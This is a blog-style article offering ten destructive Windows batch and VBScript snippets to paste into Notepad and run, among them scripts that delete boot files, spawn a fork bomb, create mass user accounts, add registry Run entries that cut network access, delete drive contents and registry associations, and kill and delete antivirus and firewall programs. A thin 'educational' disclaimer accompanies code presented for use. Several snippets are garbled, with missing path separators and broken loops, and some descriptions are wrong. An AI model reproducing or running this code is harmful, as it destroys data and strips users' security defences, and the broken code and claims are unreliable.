Top 10 Virus using notepad

A computer virus is a malicious software program loaded onto a user’s computer without the user’s knowledge and performs malicious actions. Virus and malware are very harmful to computers here are a few simple virus codes that you can create Virus using notepad.

Note: This is just for educational purposes don’t try this on your own computer.

1. Crash PC Fully

@echo off  attrib -r -s -h c:\autoexec.bat  del c:\autoexec.bat  attrib -r -s -h c:\boot.ini  del c:\boot.ini  attrib -r -s -h c:\ntldr  del c:\ntldr  attrib -r -s -h c:\windows\win.ini  del c:\windows\win.ini

Open Notepad and copy-paste the above-mentioned code and save it as Crash.bat

Function:- Once this code is executed the system reboots and crashes, and your system will give BSOD.

2. Application Bomber

@echo off start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x

Open Notepad and copy-paste the above-mentioned code and save it as Bomber.bat

Function:- Once executed, it will start to open different applications repeatedly which will affect the system’s performance. You can also add additional applications whatever you want.  

3. Folder Flooder

@echo off md %random% /folder. goto x

Open Notepad and copy-paste the above-mentioned code and save it as Flooder.bat

Function:- Once executed, it will start to generate folders with different names, the names can be any random number.

4. User Account Flooder:

@echo off :xnet user %random% /add goto x

Open Notepad and copy-paste the above-mentioned code and save it as AccFlooder.bat

Function:- Once executed, it will start creating Windows User Accounts with random names. The names can be any randomly generated number.

5. Process Creator:

%0|%0

Open the command prompt and type the above-mentioned code.

Function:- Once executed, it will start to generate a large number of processes very quickly resulting in the hanging of the PC.

6. Internet Disable:

echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED! PAUSE

Open Notepad and copy-paste the above-mentioned code and save it as DisableInternet.bat

Function:- Once executed, it will disable the internet connection of a computer permanently.  

7. OS Hacker:

@Echo off Del C: *.* |y

Open Notepad and copy-paste the above-mentioned code and save it as CrashOS.bat

Function:- Once executed, it will format the C: disk drive and hence resulting in deleting the OS. You can also replace C: with any drive of your choice.

8. Delete Registry:

@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO type your message GOTO MESSAGE

Open Notepad and copy-paste the above-mentioned code and save it as DelReg.bat

Function:- Once executed, it will delete registry files and leave a message. It can extremely affect the victim’s computer.

9. Caps Lock ON and OFF

Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop

Open Notepad and copy-paste the above-mentioned code and save it as Caps.bat

Function:- Once executed, it will turn Caps Lock continuously on and off annoying the user.

10.Disable the Antivirus

@ echo off rem rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap*cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmincls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm*cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* del /Q /F C:Program Filesalwils~1avast4*.* del /Q /F C:Program FilesLavasoftAd-awa~1*.exe del /Q /F C:Program Fileskasper~1*.exe cls del /Q /F C:Program Filestrojan~1*.exe del /Q /F C:Program Filesf-prot95*.dll del /Q /F C:Program Filestbav*.datcls del /Q /F C:Program Filesavpersonal*.vdf del /Q /F C:Program FilesNorton~1*.cnt del /Q /F C:Program FilesMcafee*.* cls del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.* del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.* del /Q /F C:Program FilesNorton~1Norton~1*.* del /Q /F C:Program FilesNorton~1*.* cls del /Q /F C:Program Filesavgamsr*.exe del /Q /F C:Program Filesavgamsvr*.exe del /Q /F C:Program Filesavgemc*.exe cls del /Q /F C:Program Filesavgcc*.exe del /Q /F C:Program Filesavgupsvc*.exe del /Q /F C:Program Filesgrisoft del /Q /F C:Program Filesnood32krn*.exe del /Q /F C:Program Filesnood32*.exe cls del /Q /F C:Program Filesnod32 del /Q /F C:Program Filesnood32 del /Q /F C:Program Fileskav*.exe del /Q /F C:Program Fileskavmm*.exe del /Q /F C:Program Fileskaspersky*.* cls del /Q /F C:Program Filesewidoctrl*.exe del /Q /F C:Program Filesguard*.exe del /Q /F C:Program Filesewido*.exe cls del /Q /F C:Program Filespavprsrv*.exe del /Q /F C:Program Filespavprot*.exe del /Q /F C:Program Filesavengine*.exe cls del /Q /F C:Program Filesapvxdwin*.exe del /Q /F C:Program Fileswebproxy*.exe del /Q /F C:Program Filespanda software*.* rem 

Open Notepad and copy-paste the above-mentioned code and save it as DisAntivirus.bat

Function:- Once executed, this will disable the antivirus on your computer. 

Warning: Don’t try this on your working computer

Read Also:

How to Change Default Encoding in Notepad?

1 thought on “Top 10 Virus using notepad”

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Scroll to Top